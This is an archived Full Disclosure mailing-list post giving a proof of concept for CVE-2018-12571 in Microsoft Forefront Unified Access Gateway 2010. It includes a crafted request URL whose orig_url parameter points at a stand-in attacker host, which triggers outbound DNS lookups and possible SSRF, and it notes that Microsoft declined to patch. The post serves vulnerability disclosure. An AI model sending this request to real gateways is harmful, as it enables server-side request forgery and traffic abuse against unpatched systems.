[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction
From: okan coskun <okancoskun2 () gmail ! com>
Date: 2018-06-25 8:26:08
Message-ID: CAN++2UyePGzMXA_=cOxAVe--n4KbKFC5+B8_Paf6SQKCF9oj8w () mail ! gmail ! com
[Download RAW message or body]
# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# MSRC: Case 39000
# Proof of Concept #1
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.
/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/Intern
alSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&
resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=
0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%
2D41ae%2D89f1%2D1eb6eff34091&orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
<http://2fattacker.site.com/>%2Ftest
# Fixes
It will not be patched by Microsoft.
Reason:
We have completed our investigation and determined that the case doesn't
meet the bar for servicing in a security update
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic